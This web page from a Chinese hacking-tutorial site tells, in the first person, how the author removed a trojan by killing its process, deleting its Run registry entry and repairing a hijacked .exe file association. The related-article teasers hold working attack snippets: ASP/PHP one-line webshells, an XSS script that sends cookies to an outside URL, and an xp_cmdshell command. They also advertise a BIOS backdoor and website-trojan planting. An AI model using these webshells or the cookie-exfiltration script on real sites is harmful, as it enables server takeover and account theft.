木马病毒的查杀过程详细介绍

所属分类: 网络安全 / 黑客教程 阅读数: 76
收藏 0 赞 0 分享

       写这个文章的目的,是让大家知道,遇到木马后应该怎么办。

  因为这个木马是我第一次接触,我想我杀木马的经历,应该会对大家有帮助的吧。

  至于这个木马的具体情况,来源,功能等详细内容,我没研究,反正zer说要写一篇文章出来的

  昨天晚上,zer4tul给我了个木马(exelinks.exe),让我来试试,呵呵。

  收到后,运行,没有任何反应(废话!!)

  然后,我查看进程,先把exelinks进程杀掉,然后运行regedit
  …………………………
  ……………………………………
  ……………………………………………………

  找不到这个文件!!!


  我ft

  难道是exe文件被关联无法打开了?

  查找,居然是这个文件丢了(zer4tul那里没丢,看来不具备共性)

  只好运行regedt32.exe了,呵呵

  发现在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun下面多了一个网络服务 启动程序名字为 svchoost.exe,这个当然是他了,删除,呵呵

  这个时候,我重起系统,运行regedt32,发现run里又有了他,杀进程,删除文件

  既然又有,说明还有启动的来源,来源是什么?对了,我不是运行了regedt32吗?这个可是exe文件啊。

  查看.exe内容,写的exefile,没问题

  查看exefile内容,shellopencommand里的内容为

  winnt/system32/exelinks.exe %1 %*,呵呵,果然关联了


  修改回来,%1 %*

  另外根据zer4tul提示,这个程序原始名字是windowssend.exe

  我在winnt/system32/start 目录找到了它

  估计是想做个自动启动吧,呵呵,这个文件也删除掉

  重起系统,看进程,看注册表,一切正常了,这样,木马就杀完了

更多精彩内容其他人还在看

一句话木马(asp,php) 总结篇

asp一句话 <%execute(request("1"))%> php一句话 <?php eval($_POST[1]);?> aspx一句话 <script language="C#" run
收藏 0 赞 0 分享

asp php XSS获取cookie的代码

<script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</scr
收藏 0 赞 0 分享

冰河暗涌防不胜防 BIOS下实现的Telnet后门

该项目仅为实验性项目,主要目的是想隐藏一个Telnet后门在主板的BIOS内,并让其随着计算机系统及操作系统成功的运行起来。运行后能反向Telnet连接到指定的计算机接受控制。 项目涉及的相关知识及技术目录 1、 实验环境,使用bochs调试工具。 2、 刷新BIOS技术问
收藏 0 赞 0 分享

网页挂马详细步骤教程

其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。 下面我介绍5种方法,我一个一个介绍 方法一:这个就是最简单的了,只要你懂点html语言 把下面这段代码插进网页中:
收藏 0 赞 0 分享

汇编揭开死循环的神秘面纱

i 首先请大家看这么一个简单的小程序: #include <stdio.h> void main() {     int i
收藏 0 赞 0 分享

用递归写Win32的文件夹遍历

文件夹遍历技术是一种非常有用的技术,在文件的搜索以及杀毒软件中都使用了这种技术。以下我将讨论如何在Win32下实现这种技术。 文件夹遍历技术的核心就是使用递归算法,关于递归算法,我这里就不多介绍了,不明白的朋友请找出谭先生的《C程序设计》参阅相关内容。 以下是
收藏 0 赞 0 分享

“QQ反骚扰”开发手记

呆在家中上网聊天实在不是一件惬意的事:每一天打开QQ,迎接我的都是一串一串的广告……国庆黄金周,连广告也不放过!:( 无奈,打开Visual C++,开始了我的“反骚扰”之路。 首先我面对的问题是:QQ一共有几种广告,我能
收藏 0 赞 0 分享

让本地连接不再受限

  “本地连接”突然受限   单位局域网中有一台旧计算机,平时安装使用的是Windows XP系统,在该系统环境下该计算机可以正常访问网络;后来,某位同事为了能够在第一时间体验到Windows Vista系统的精彩,特意对该计算机系统进行了升级,不过升
收藏 0 赞 0 分享

SQL语句导入导出大全

/******* 导出到excel EXEC master..xp_cmdshell 'bcp SettleDB.dbo.shanghu out c:temp1.xls -c -q -S"GNETDATA/GNETDATA" -U"sa&quo
收藏 0 赞 0 分享

黑客教你7招秘籍入侵xp系统

 第一招:屏幕保护   在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,
收藏 0 赞 0 分享
查看更多